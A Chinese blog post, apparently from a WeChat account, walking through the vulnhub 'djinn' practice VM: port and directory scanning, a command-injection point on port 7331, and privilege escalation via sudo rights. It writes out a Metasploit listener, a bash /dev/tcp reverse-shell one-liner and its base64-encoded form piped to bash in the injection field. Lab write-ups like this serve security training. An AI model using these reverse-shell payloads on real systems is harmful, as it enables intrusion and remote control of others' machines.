本周末实践的是vulnhub的djinn镜像,下载地址,https://download.vulnhub.com/djinn/djinn.ova,
用workstation打开,直接就拿到了地址,省的再地址扫描了,
直接做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.137.7,
7331端口运行着web服务,做个目录爆破,
sudo gobuster dir -u http://192.168.137.7:7331 -w /usr/share/wordlists/dirb/big.txt,
浏览器访问http://192.168.137.7:7331/wish,发现命令注入点,
攻击机上起个监听,
msfconsole
use exploit/multi/handler
set payload cmd/unix/reverse_bash
set lhost 192.168.137.99
set lport 4444
exploit
准备个反弹shell命令,
bash -i >& /dev/tcp/192.168.137.99/4444 0>&1,
转成base64编码,
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEzNy45OS80NDQ0IDA+JjE=,
在页面输入框中提交,
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEzNy45OS80NDQ0IDA+JjE= | base64 -d | bash,
拿到反弹shell,不是root,需要提权,先转成交互式shell,
python -c 'import pty; pty.spawn("/bin/bash")',
在/home/nitish/.dev下发现用户名密码文件,
切换到nitish,发现可以用sam用户执行/usr/bin/genie,
再得到sam用户的shell,发现可以用root用户执行/root/lago,
切换root,选择2,猜数字,然后输入num,竟然成了,
本期实践的靶机难度较大,从命令注入开始都是直接参考别人的writeup。
本文始发于微信公众号(云计算和网络安全技术实践):vulnhub之djinn的实践
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论